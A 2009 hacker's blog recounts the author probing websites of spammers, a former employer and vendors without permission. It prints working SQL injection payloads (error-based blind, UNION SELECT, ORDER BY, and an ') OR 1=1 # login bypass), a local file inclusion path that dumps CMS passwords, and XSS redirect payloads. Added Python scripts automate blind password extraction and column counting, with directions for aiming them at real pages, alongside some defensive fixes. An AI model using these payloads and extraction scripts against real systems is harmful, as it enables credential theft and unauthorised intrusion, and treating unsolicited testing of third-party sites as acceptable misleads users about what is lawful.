Tuesday, August 4, 2009

Well well..

Yesterday I got the next email:

Dear Webmail Account User

This message is from the Webmail IT Service messaging center to all account owners. Due to the incessant rate of Spam we are currently performing maintenance and up-grading our Digital webmail services for your convenience.

To prevent your account from closing during this exercise you will have to update it below to know it's status as a currently used account with a hard spam protector.

Confirm Your WebMail Details;
User Name:
Password:
Date of Birth:

You will be sent a new confirmation alphanumerical password so that it will only be valid during this period and can be changed after the process. Please understand that this is a security measure intended to help protect your Webmail Account.

Webadmin IT Help Desk

Well, odd... but not uncommon. I decided to check what the fuss was about. The 'from' address was: Helpdesk
The reply address was 'slightly' different though: help2desk@mail2webmaster.com

mail2webmaster.com is a company that allows people to get an email account, like Hotmail and Gmail. However, I was more interested in citechco.net. citechco.net appears to be vulnerable to SQL injection, so I'm not quite sure why this dude is trying to obtain login credentials by sending a mass phishing mail; SQL injection does the job so much better. I might post an exploit later, once I've informed citechco.net about the 'little' vulnerability.

Good job.



Tuesday, June 16, 2009

My old internship company

A year ago I did my orientation internship at a web development company that mainly programmed in ASP and ASP.NET, both languages I utterly hate for their lack of clarity and flexibility. I had to work for them for 10 weeks, which wasn't that much. After about 7 or 8 weeks they offered me a contract that would allow me to work for them 0-10 hours a week for a quite okay pay rate. I accepted, signed the contract and we were happy. After the 10 weeks I had to turn in my paper covering the 10 weeks I worked at this company. The paper was very critical. And, like many people, they didn't like being judged by an 'intern'. So I could give them back the contract and I was basically fired before starting. Well, that's not completely true: I worked 10 hours for them and I didn't get paid. Evil.

Anyway, to get to the point: they recently delivered a webshop, actually written in PHP, so I had to test it for holes. And yes! SQL injection, except that this one was a little tricky: I always got an 'OK' message. I had to find a way around this, so I tried the following:

id=246 AND IF(1=(SELECT CHAR_LENGTH(pass) FROM users LIMIT 0,1),1,(SELECT 1 UNION SELECT 2))

Basically, this query uses the guessed length as the oracle: if the guess (here 1) matches the length of the first user's password, IF() returns 1 and I get a normal page. If the length doesn't match, IF() evaluates the scalar subquery (SELECT 1 UNION SELECT 2), which yields two rows, and MySQL aborts with the error: Subquery returns more than 1 row. Step the guess up until the page comes back normal; the same IF() wrapper then answers any other true/false question about the data.

So an exploit was in place and soon I had the first user's email and password. Now the funny part is that I suspect this first user is the one who wrote the webshop. He works at a different company than the one I did my internship at. It appears that this other company is in the same building where I work now. Funny.

Anyway, there's nothing more hilarious than trying to hack the website of the company where I did my orientation internship. Before actually going into this I have to tell you one of the things I disliked a lot about this company. They didn't use any databases. They used... XML files! For everything. Really! I mean... come... onnnnnn...

Ok, now back to their website. It didn't take me long for this one. Since they use XML files for everything, there is no SQL to inject into, so a different approach was needed: local file inclusion.

page.asp?inc=cgi-bin/xmldocs/b_users.xml

The above request returned all the usernames and passwords for their content management system.

All their passwords were the same. Another point for the critique!

Woo a beertender for my efforts.

Well, last time I spoke about the backup company's website. This website had a few serious holes in it. It appears the website WAS written by themselves. Made me wonder how well the software that takes care of the backups is written. Anyway, to get to the point: shortly after my companion notified them about the leak they were happy and asked if we were happy with a bottle of wine. Well, I don't drink wine, my companion doesn't drink it, so no. Ok, ok, we said yes. Later on we got an email from another dude from that company telling us that we DIDN'T like wine. Wow, superstitious. So he figured we liked beer and decided to send something our way.

A few days ago we received a beer tender! Woo! That's very nice. You can buy it from us on eBay. Thank you.

(Not that we don't like a beer tender, but it's expensive and I prefer bottles over a beer tender...)

Friday, May 22, 2009

'secure backup'

Recently my company decided to become a reseller for a backup company. This company installs a program on someone's computer and uploads data over an SSL link. Pretty cool, you'd say, if it wasn't for the fact that their website is a leaking basket running MSSQL.

I'm not very fond of MSSQL. It's too dangerous: forget one cast or escape and you're screwed. People can simply drop your database table by table.

Anyway, the fun part is that this company is telling people that there's nothing safer than their backup tool. That might be true; however, considering their website, I very much doubt it. Thank god they didn't develop their website on their own.

In two days we'll be contacting them about this security issue. We might benefit from this mistake! ;)

Oh the injection was a simple one:

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

Adding ,1 one column at a time until that error went away, and eventually:

-1 union all select 1,2,3,4,password,username,7,8,9,10,11,12,13,14,15,16,17 from tblUsers #

gave me everything I needed for a solid proof of concept ;)
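The column-count step automated, as an added example (my code, not the post's or the backup company's): append one more literal until the Jet error string disappears, then drop the wanted column names into the positions that are echoed on the page. The quoted "Microsoft JET Database Engine error" wording is the Jet engine's own, which is what you see behind classic ASP sites backed by an Access database. The send callback and mock_target are constructed stand-ins, the 17-column width and the tblUsers/password/username names are taken from the payload above, and the terminator the post appends (#) is left off here because it depends on the backend.

```python
import re
from typing import Callable, Dict

# Error text from the page above; it appears while the UNION's column count is wrong.
JET_COLUMN_ERROR = ("The number of columns in the two selected tables or queries "
                    "of a union query do not match.")


def union_probe(ncols: int) -> str:
    # -1 makes the original SELECT return nothing, so only UNION rows would show.
    return "-1 union all select " + ",".join(str(i + 1) for i in range(ncols))


def find_column_count(send: Callable[[str], str], max_cols: int = 64) -> int:
    """Grow the literal list one column at a time until the Jet error goes away.

    send(id_value) must return the response body for the injected id value.
    """
    for n in range(1, max_cols + 1):
        if JET_COLUMN_ERROR not in send(union_probe(n)):
            return n
    raise RuntimeError("no column count up to max_cols matched")


def union_payload(ncols: int, table: str, wanted: Dict[int, str]) -> str:
    # Put real column names at the positions known to be rendered; keep numbers elsewhere.
    cols = [wanted.get(i, str(i)) for i in range(1, ncols + 1)]
    return f"-1 union all select {','.join(cols)} from {table}"


# --- Constructed stand-in for the ASP page; NOT the real site. ---------------
REAL_COLUMNS = 17   # the width the post ended up with

def mock_target(id_value: str) -> str:
    m = re.match(r"-1 union all select (.+?)(?: from \w+)?$", id_value)
    given = len(m.group(1).split(",")) if m else 0
    if given != REAL_COLUMNS:
        return f"Microsoft JET Database Engine error '80040e14' {JET_COLUMN_ERROR}"
    return "<html>product page</html>"


if __name__ == "__main__":
    n = find_column_count(mock_target)
    print(n, union_payload(n, "tblUsers", {5: "password", 6: "username"}))
```

Against a real target, send() is an HTTP GET with the value in the id parameter; if the error is not displayed, look for a change in the page instead (with the wrong count the page usually renders empty or throws a generic error, with the right count the numeric literals show up in the HTML and tell you which positions to use).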


Cheers.

Monday, April 20, 2009

SQL Injection inside the ORDER BY clause

I never really did any research into SQL injection inside the ORDER BY clause. If nothing from the query shows up on screen, brute-forcing is basically the only way, but how to go about it? Since the injection is blind, we need something that will make the SQL break.

For example, if we have the query: SELECT * FROM users ORDER BY username {injection}

We get raw access to the tail of this query: whatever we inject replaces ASC or DESC.
Injecting the following: ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --

There are two things that can happen. If the query executes normally, you know that the first character of the password has ASCII value 50 (the digit '2').

Note that this needs the column to be evaluated for a single record; if the query returns multiple rows or you cannot control the LIMIT clause, use a subquery with its own LIMIT 0,1 in place of the direct ASCII(SUBSTRING()) on the column.

Back to the query: if the character is incorrect, the following message will appear, provided mysql_error() output is printed: Subquery returns more than 1 row

So basically you need to write an exploit that, once a query has executed properly, remembers the matched character and moves on to the next position.

In Python, something like this, where post() sends the injection with one candidate character filled in at the given position and returns True when the page rendered without the subquery error:

def get(post, sql_injection_url_and_string, charset, length):
    emptypassword = ""
    for i in range(1, length + 1):          # position in the string being recovered
        for ch in charset:                  # candidate character for this position
            if post(sql_injection_url_and_string, i, ch):
                # The query was successful: this character matched
                emptypassword += ch
                break                       # move to the next position
    print(emptypassword)
    return emptypassword


I applied this method for finding table and column names from information_schema.tables and information_schema.columns.

This kind of SQL injection I enjoy the most. It's not as easy as the UNION SELECT approach. It requires some thinking and writing an exploit.
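Both posts' probes put together as an added example (my code, not the exploit from either post): the CHAR_LENGTH() guess from the June 16 webshop post finds the length, then the ASCII(SUBSTRING()) guess from this post recovers one character at a time, each wrapped in the IF(..., 1, (SELECT 1 UNION SELECT 2)) construction that turns a wrong guess into the "Subquery returns more than 1 row" error. The users table, the pass column and the id=246 prefix are taken from the June post; send, mock_target and the SECRET value are constructed stand-ins, and the mock only understands the two probe shapes this client emits. This oracle only works while MySQL errors reach the page; if they are suppressed you need a content or timing difference instead.

```python
import re
from typing import Callable

# Text PHP shows when mysql_error() output reaches the page and the IF()
# fallback subquery returns two rows.
MYSQL_ERROR = "Subquery returns more than 1 row"

# Brute-force alphabet, as in the post; widen it for real targets.
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.-@!"


def payload(condition: str) -> str:
    """Wrap a true/false condition in the post's error-forcing IF() (id=246 AND ...).

    True  -> IF() yields 1 and the page renders normally.
    False -> IF() evaluates (SELECT 1 UNION SELECT 2); MySQL aborts with MYSQL_ERROR.
    """
    return f"246 AND IF(({condition}),1,(SELECT 1 UNION SELECT 2))"


def length_condition(n: int) -> str:
    # The June 16 post's CHAR_LENGTH probe with the guessed length as parameter.
    return f"{n}=(SELECT CHAR_LENGTH(pass) FROM users LIMIT 0,1)"


def char_condition(pos: int, code: int) -> str:
    # This post's ASCII(SUBSTRING()) probe, pinned to one record via a subquery.
    return f"ASCII(SUBSTRING((SELECT pass FROM users LIMIT 0,1),{pos},1))={code}"


def extract(send: Callable[[str], str], max_len: int = 64) -> str:
    """Recover the first user's password using nothing but the error oracle.

    send(id_value) must return the response body for ?id=<id_value>.
    """
    length = None
    for n in range(1, max_len + 1):                       # step 1: length
        if MYSQL_ERROR not in send(payload(length_condition(n))):
            length = n
            break
    if length is None:
        raise RuntimeError("could not determine length")

    recovered = ""
    for pos in range(1, length + 1):                      # step 2: one position at a time
        for ch in CHARSET:
            if MYSQL_ERROR not in send(payload(char_condition(pos, ord(ch)))):
                recovered += ch                           # this character matched
                break                                     # move to the next position
        else:
            raise RuntimeError(f"no character in CHARSET matched position {pos}")
    return recovered


# --- Constructed stand-in for the vulnerable shop; NOT the real target. ----
# It understands only the two probe shapes above and answers the way a PHP
# page that prints mysql_error() would.
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed sample value

_LEN_RE = re.compile(r"IF\(\((\d+)=\(SELECT CHAR_LENGTH\(pass\)")
_CHR_RE = re.compile(r"LIMIT 0,1\),(\d+),1\)\)=(\d+)")


def mock_target(id_value: str) -> str:
    m = _LEN_RE.search(id_value)
    if m:
        ok = int(m.group(1)) == len(SECRET)
    else:
        m = _CHR_RE.search(id_value)
        pos, code = int(m.group(1)), int(m.group(2))
        # MySQL: SUBSTRING() past the end gives '' and ASCII('') is 0.
        ok = (ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0) == code
    return "<html>OK</html>" if ok else f"<b>Warning</b>: {MYSQL_ERROR}"


if __name__ == "__main__":
    print(extract(mock_target))   # prints the constructed SECRET
```

To run it against a real page, replace mock_target with a function that performs the GET with the value in the id parameter and returns the body. Budget up to len(CHARSET) requests per character this way; swapping the = probe for a > comparison and binary-searching the 0-127 range needs at most 7 requests per character, which matters when the target is slow or the string is a 32-character hash.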

Sunday, April 12, 2009

'HACKLAMER'

Well, two blokes decided to create a new service which makes it possible for people to digitally send invoices. Ok, nice, thanks for telling me, I really don't care. If I need something I'll google it. Don't email me with fancy links that register whether a spam email was successful. I don't like that. So here we go again.

The email contained links to their service; however, my email address was stored inside the link. So they want to know if they should send me more email? Or maybe to see how many of the emails they sent successfully pulled users to their website. Anyway, I decided to see if the site was secure, and after some testing I concluded the normal approach didn't work that well: they clearly took care of the most common vulnerabilities. So I had to think outside the box and thought: what do they do with the email addresses they register? Right, it has to show up somewhere, most likely in a fancy interface they made for it! And they probably never thought of escaping that. So I injected: ?id=<script>window.location='http://www.mywebsite.nl'</script>

And guess what, within 20 minutes of the injection I got an email from one of the dudes telling me that my "failed" hack attempt has been reported to the police..

In what way did it fail? It might not have executed the script, but the result was exactly the same: he paid a visit to our website. Thank you, come again!

Of course you can understand I analyzed his email and the IP address it came from. I made the mistake of not getting the IPs behind a proxy. Yup, he used a proxy to send me an email. Chicken!

Oh and he blocked my IP for every one of his sites! brr...

Here's what he sent (translated from Dutch):

Message field: We will file a police report about your (failed) hacking attempt on our website.

30-03-2009 17:27 - HACKLAMER (x.x.x.x): Viewing demo (\')
30-03-2009 17:32 - HACKLAMER (x.x.x.x): Viewing demo (window.location=\'http://www.mywebsite.nl\')
30-03-2009 17:33 - HACKLAMER (x.x.x.x): (window.location=\'http://www.mywebsite.nl\')
Phone field:

IP address: 194.109.22.147
Language selected: Dutch
Time: 17:42 - 30 Mar 2009

The IP resolves to an xs4all.nl proxy.

He was nice enough to include the log, which indicates he uses a self-made system, since I don't know any tool that will call someone a 'hack lamer'. Anyway, the tool strips tags. Now that is not safe, my friend. I wonder if:
<scr<script>IPT>window.location='http://www.mywebsite.nl'</SCR</script>IP>
would have worked, since strip_tags() would be kind enough to concatenate the script tags for me. Too bad the quotes are being escaped. Something lame like <plain<plaintext>text> would have been annoying in that case; being tagged 'hack lamer' would suit ;)

But I'm not there to break things, just to notify people!
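The point of the nested-tag idea, shown as an added example (my code, not the invoice site's and not PHP's strip_tags(), which is a different state machine that would have to be tested separately): a one-pass tag remover leaves pieces that re-form a tag, while HTML-encoding at output time leaves nothing for the browser to parse. strip_script_tags is a constructed naive filter used as the stand-in; the log line format copies the HACKLAMER log above and the two payloads are the post's.

```python
import html
import re

# The post's payload and the nested variant it wonders about.
PLAIN = "<script>window.location='http://www.mywebsite.nl'</script>"
NESTED = "<scr<script>IPT>window.location='http://www.mywebsite.nl'</SCR</script>IP>"


def strip_script_tags(value: str) -> str:
    """CONSTRUCTED naive sanitizer: delete <script> / </script> in a single pass.

    Stand-in for one-pass tag removal; not PHP's strip_tags() and not the
    target's code. Because it runs once, what is left can form a new tag.
    """
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def log_line_unsafe(user: str, ip: str, action: str) -> str:
    # Admin log entry in the shape of the post's log: "cleaned" input is still
    # concatenated into HTML without encoding.
    return f"30-03-2009 17:32 - {user} ({ip}): Viewing demo ({strip_script_tags(action)})<br>"


def log_line_safe(user: str, ip: str, action: str) -> str:
    # Same entry, every untrusted field HTML-encoded at output time. The log
    # keeps the attacker's exact input for evidence; it just is not markup.
    return (f"30-03-2009 17:32 - {html.escape(user)} ({html.escape(ip)}): "
            f"Viewing demo ({html.escape(action)})<br>")


def contains_script_element(markup: str) -> bool:
    # Crude detector for an executable script start tag; HTML tag names are
    # case-insensitive, so <scrIPT> counts the same as <script>.
    return re.search(r"<script\b", markup, flags=re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, value in (("plain", PLAIN), ("nested", NESTED)):
        print(name, "stripped :", contains_script_element(log_line_unsafe("HACKLAMER", "x.x.x.x", value)))
        print(name, "escaped  :", contains_script_element(log_line_safe("HACKLAMER", "x.x.x.x", value)))
```

Stripping the plain payload works, the nested one survives as <scrIPT>...; html.escape handles both because the decision moves from "which input is dangerous" to "this field is text, never markup", which is the only rule that does not need updating every time someone finds a new tag trick.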

Saturday, April 11, 2009

hah sending 50k emails a day ?

Today I got an email from a company which will print your lovely designed business card for an outrageous amount of money. Now, getting an email isn't that bad; however, I got the email 3 times in the last 2 months, which is in my opinion too much! So I decided to inspect the email a bit closer, and I noticed that they used a website that sells these kinds of mailing lists.

I'm in it! no! AhH get me out .. wait.. lets check their website first..
Wow, 9 errors, all file inclusion and SQL injection.

So I managed to get to their login page, and just trying to enter with username ' and password ' gave me the following error:

SELECT `id`, `username` FROM `core__user` WHERE 1 AND (`core__user`.`username` = ''') AND (`core__user`.`active` = 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))' at line 1


How nice of them, printing the entire query for me! The first thing you might notice is: why the hell are they escaping the password but not the username? Why?????!??

So looking at the query,
') OR 1=1 --
should do the trick, you'd say. Nope, it didn't. Apparently they filtered the comment sequences -- and /*. But luckily we have a third one. Yes! It's the #!
') OR 1=1 #
That let me in with full access to all their customers. I could see who sent what email and to whom. The company I got the email from sent around 50k emails a day, which is like lol.

Anyway, I reported the error and they said they fixed the 'bug'. They thanked me and told me they removed my email address. The email address I used to send them an email wasn't even in their database. Good job. So I replied back to remove the entire mywebsite.nl range.
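The leaked query rebuilt against an in-memory sqlite database, as an added example (my code, not the mailing-list site's): the vulnerable login concatenates the username raw and escapes only the password, exactly as in the error above, and blocks -- and /* the way the site did; the fixed login is the same query parameterised. MySQL's ENCODE() does not exist in sqlite, so a keyed hash is registered under that name to keep the query shape, and sqlite has no # comment, so the bypass payload balances its own quotes and parentheses instead of commenting out the tail. The key z4p3DQSC and the core__user table are from the leaked query; the admin/s3cret account and the BYPASS string are constructed.

```python
import hashlib
import sqlite3
from typing import Optional, Tuple

KEY = "z4p3DQSC"   # the ENCODE() key that leaked in the error message


def encode(value: str, key: str) -> str:
    # Stand-in for MySQL's ENCODE(value, key), registered into sqlite under that name.
    return hashlib.sha256((key + value).encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.create_function("ENCODE", 2, encode)
    con.execute("CREATE TABLE core__user (id INTEGER, username TEXT, active TEXT, password TEXT)")
    # Constructed sample account; not data from the target.
    con.execute("INSERT INTO core__user VALUES (1, 'admin', 'yes', ENCODE('s3cret', ?))", (KEY,))
    return con


def reject_comments(value: str) -> str:
    # Mirrors the filtering the post ran into: -- and /* are refused outright.
    if "--" in value or "/*" in value:
        raise ValueError("comment sequence blocked")
    return value


def login_vulnerable(con, username: str, password: str) -> Optional[Tuple[int, str]]:
    # Username concatenated raw, password escaped (sqlite doubles the quote where
    # MySQL backslash-escapes it); the shape of the leaked query.
    username = reject_comments(username)
    esc_pw = password.replace("'", "''")
    sql = (f"SELECT id, username FROM core__user WHERE 1 AND (username = '{username}') "
           f"AND (active = 'yes') AND (password = ENCODE('{esc_pw}', '{KEY}'))")
    return con.execute(sql).fetchone()


def login_safe(con, username: str, password: str) -> Optional[Tuple[int, str]]:
    # Parameterised: input never becomes SQL text, so no comment filter is needed.
    sql = ("SELECT id, username FROM core__user WHERE 1 AND (username = ?) "
           "AND (active = 'yes') AND (password = ENCODE(?, ?))")
    return con.execute(sql, (username, password, KEY)).fetchone()


# No comment sequence at all: OR 1=1 sits at the top level of the WHERE and the
# trailing ('1'='1 re-uses the query's own closing quote and parenthesis.
BYPASS = "') OR 1=1 OR ('1'='1"

if __name__ == "__main__":
    con = make_db()
    print(login_vulnerable(con, BYPASS, "anything"))   # first user, no password needed
    print(login_safe(con, BYPASS, "anything"))         # None
```

The takeaway is the one the post arrives at from the other direction: a blacklist of comment sequences only removes one way of ending the statement, and the injected text can just as well finish the statement itself. Binding the values (or, failing that, escaping every field, not just the password) is what closes it.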

Friday, April 10, 2009

My first entry

Alright, this will be my first blog item. The reason I decided to create a blog is that I enjoy sharing my experience and techniques with others.

So here's my first blog item. A little introduction is in order: my name is Wim Wisselink, I'm currently still studying and I run my own company with a friend whose main focus is making sure that our bank account is not empty!

I'm basically the lead programmer and the one who gets the blame when something breaks. Nevertheless I enjoy my work as a programmer. I enjoy my work as a penetration tester even more. The moment a server shows an error I get a thrill: the thrill of exploiting it and no... not abusing it... but reporting it.

I often get spam mail which sends me to their website and tells me to buy their product; instead I check their website for vulnerabilities and make them a counter proposal. Until now... it never worked. Too bad... So I tried a new approach. Don't bother trying to benefit from it, just tell them what the problem is and they might cut you in on a deal...

Anyway so far my first entry